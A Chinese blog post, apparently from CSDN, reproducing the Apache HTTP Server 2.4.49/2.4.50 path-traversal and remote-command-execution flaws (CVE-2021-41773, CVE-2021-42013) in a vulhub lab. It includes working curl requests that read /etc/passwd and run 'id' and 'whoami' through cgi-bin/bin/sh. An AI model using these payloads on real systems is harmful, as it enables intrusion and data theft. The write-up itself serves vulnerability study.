Apache HTTP Server2.4.50中的路径遍历和命令执行漏洞(CVE-2021-41773 & CVE-2021-42013)

最新推荐文章于 2024-05-29 21:04:59 发布
最新推荐文章于 2024-05-29 21:04:59 发布
阅读量1k 收藏 2
点赞数 1
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63231007/article/details/127252824
版权

CVE-2021-41773

一、漏洞介绍

        HTTP Server 2.4.49版本使用的ap_normalize_path函数在对路径参数进行规范化时会先进行url解码,然后判断是否存在…/的路径穿越符。

        当检测到路径中存在%字符时,如果紧跟的2个字符是十六进制字符,就会进行url解码,将其转换成标准字符,如%2e->.,转换完成后会判断是否存在…/。
        如果路径中存在%2e./形式,就会检测到,但是出现.%2e/这种形式时,就不会检测到,原因是在遍历到第一个.字符时,此时检测到后面的两个字符是%2而不是./,就不会把它当作路径穿越符处理,因此可以使用.%2e/或者%2e%2e绕过对路径穿越符的检测

二、影响版本

Apache HTTP2.4.49

三、漏洞复现

cd vulhub/httpd/CVE-2021-41773

docker-compose up -d开启环境

docker ps得知开放的是8080端口

漏洞利用poc

curl -v --path-as-is http://192.168.236.128:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

CVE-2021-42013

一、漏洞介绍

该漏洞是由于在 Apache HTTP Server 2.4.50版本中对CVE-2021-41773修复不够完善,攻击者可利用该漏洞绕过修复补丁,并利用目录穿越攻击访问服务器中一些文件,进而造成敏感信息泄露。若httpd中开启CGI功能,攻击者可以构造恶意请求,造成远程代码执行

二、影响版本

  • Apache HTTP Server 2.4.49
  • Apache HTTP Server 2.4.50

三、漏洞复现

cd vulhub/httpd/CVE-2021-42013

docker-compose up -d开启环境

docker ps得知开放的是8080端口

 访问开启的环境,看到了 It works 证明环境开启成功

漏洞利用poc:

curl -v --path-as-is 目标地址:端口/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd

 存在目录遍历漏洞

 在服务器上启用 mods cgi 或 cgid 后 此目录遍历漏洞将允许任意命令执行:

curl -v --data "echo;id" 'http://ip:port/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'
或者
curl -s --path-as-is -d 'echo Content-Type: text/plain; echo; whoami' "http://ip:port//cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh"

葫芦娃42
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现】Apache HTTP Server 2.4.49、2.4.50 RCE(CVE-2021-41773
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
10-22 831
Apache HTTP Server是一个开源、跨平台的Web服务器,它在全球范围内被广泛使用。2021年10月5日,Apache发布更新公告,修复了Apache HTTP Server2.4.49的一个路径遍历和文件泄露漏洞CVE-2021-41773)。攻击者可以通过路径遍历攻击将 URL 映射到预期文档根目录之外的文件,如果文档根目录之外的文件不受“requireall denied”访问控制参数的保护(默认禁用),则这些恶意请求就会成功。
Apache HTTP Server 2.4.50路径穿越以及远程代码执行(CVE-2021-42103)
m0_58596609的博客
12-28 704
Apache HTTP Server 2.4.50路径穿越以及远程代码执行(CVE-2021-42103)
Apache HTTP Server 2.4.49 路径遍历和文件泄露漏洞 (CVE-2021-41773)复现实验报告
weixin_48400575的博客
02-13 3920
Apache HTTP Server 2.4.49 路径遍历和文件泄露漏洞 (CVE-2021-41773)复现实验报告
Apache漏洞复现:【CVE-2021-42013】&【CVE_2021_41773】&【CVE-2017-15715】
最新发布
MateSnake的博客
05-29 1119
Apache漏洞复现:【CVE-2021-42013】&【CVE_2021_41773】&【CVE-2017-15715】
Apache HTTP Server 2.4.50 路径穿越漏洞CVE-2021-42013
weixin_47311099的博客
12-07 2253
Apache HTTP Server 2.4.50 路径穿越漏洞CVE-2021-42013Apache官方在2.4.50版本2.4.49版本出现的目录穿越漏洞CVE-2021-41773进行了修复,但这个修复是不完整的,CVE-2021-42013是对补丁的绕过。 攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。 这个漏洞可以影响Apache HTTP Server 2.4.49
(环境搭建+复现)Apache CVE-2021-41773 && CVE-2021-42013系列漏洞复现
daxi0ng的博客
10-11 1816
0x00 简介 Apache HTTP ServerHTTPd)是Apache软件基金会的一个开放源代码的网页服务器。 0x01 漏洞概述 Apache HTTP Server目录遍历漏洞CVE-2021-41773 影响版本:Apache HTTP Server 2.4.49 该漏洞是由于Apache HTTP Server 2.4.49版本存在目录穿越漏洞,攻击者利用该漏洞在未授权的情况下,访问服务器未在httpd配置文件标记为拒绝请求的文...
Apache HTTP Server2.4.56 mod_proxy_uwsgi 模块存在请求走私漏洞CVE-2023-27522)
murphysec的博客
03-09 1370
Apache HTTP Server 是一个Web服务器软件。 该项目受影响版本存在请求走私漏洞。由于mod_proxy_uwsgi.c uwsgi_response方法对于源响应头缺少检查,当apache启用mod_proxy_uwsgi后,攻击者可利用过长的源响应头等迫使应转发到客户端的响应被截断或拆分,进而可能造成会话劫持等危害
CVE-2020-17519:Apache Flink 目录遍历漏洞批量检测 (CVE-2020-17519)
05-30
该脚本为Apache Flink 目录遍历漏洞批量检测 (CVE-2020-17519)。 使用方法:Python CVE-2020-17519.py urls.txt urls.txt 每个url为一行,漏洞地址输出在vul.txt 影响版本: Apache Flink 1.11.0、1.11.1、...
CVE-2018-11759:显示如何利用CVE-2018-11759的概念证明
03-19
概念验证描述特定于Apache Web服务器(httpd)的代码在将请求的路径Apache Tomcat JK(mod_jk)连接器1.2.0至1.2.44的URI-worker映射进行匹配之前对其进行了规范化,无法正确处理某些边缘情况。如果仅通过httpd...
Apache Flink目录遍历(CVE-2020-17519)批量检测脚本
09-24
2021年1月5日,Apache Flink官方发布安全更新,修复了由蚂蚁安全非攻实验室发现提交的2个高危漏洞漏洞之一就是Apache Flink目录遍历漏洞(CVE-2020-17519)。 Flink核心是一个流式的数据流执行引擎,其针对数据流的...
Apache Flink目录遍历(CVE-2020-17519)单目标检测工具
09-24
2021年1月5日,Apache Flink官方发布安全更新,修复了由蚂蚁安全非攻实验室发现提交的2个高危漏洞漏洞之一就是Apache Flink目录遍历漏洞(CVE-2020-17519)。 Flink核心是一个流式的数据流执行引擎,其针对数据流的...
目录遍历漏洞
weixin_45095113的博客
11-15 4508
目录遍历
Apache HTTP Server 2.4.49 路径穿越漏洞CVE-2021-41773
weixin_45366453的博客
07-21 787
Apache HTTP Server 2.4.49 路径穿越漏洞CVE-2021-41773
Apache-RCE、目录遍历漏洞、文件解析
weixin_68408599的博客
12-21 1213
Apache HTTP Server 2.4.49、2.4.50 版本对路径规范化所做的更改存在一个路径穿越漏洞,攻击者可利用该漏洞读取到 Web 目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。Apache HTTPD 是一款 HTTP 服务器。其 2.4.0~2.4.29 版本存在一个解析漏洞,在解析 PHP 时,1.php\x0A 将被按照 PHP 后缀进行解析,导致绕过一些服务器的安全策略。
apache漏洞复现-多后缀解析漏洞,换行解析漏洞2.4.49,2.4.50
weixin_64655821的博客
10-13 1984
apache漏洞复现-多后缀解析漏洞,换行解析漏洞2.4.49,2.4.50
apache目录遍历和任意命令执行CVE-2021-42013
m0_49025459的博客
12-12 381
服务器存在/icon/目录,并且可以访问,我们就可以将..进行两次url编码,从而遍历其他目录,获得服务器上的敏感信息:系统配置文件,网站源码等。这里需要将请求方法转换为POST,使用 /bin/sh ,来执行请求体命令。如果可以调用cgi接口,那么我们就可以利用这个漏洞执行任意命令。直接访问靶场进行抓包,对所抓的包进行修改。调用cgi接口,执行任意命令
Apache HTTP Server 2.4.50 路径穿越漏洞(CVE-2021-42013)
weixin_44047654的博客
12-07 721
Apache HTTP Server 2.4.50 路径穿越漏洞(CVE-2021-42013)
HTTP请求走私漏洞简单分析
Aiwin的博客
07-30 1186
HTTP请求走私漏洞简单分析
Apache Spark 命令注入漏洞CVE-2022-33891)修复与利用
Apache Spark 命令注入漏洞CVE-2022-33891)是 Apache Spark 的一种高危漏洞,允许攻击者通过命令注入来执行恶意命令,从而控制服务器。该漏洞影响 Apache Spark 版本小于 3.0.3、3.1.1 到 3.1.2 以及 3.3.0 及...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值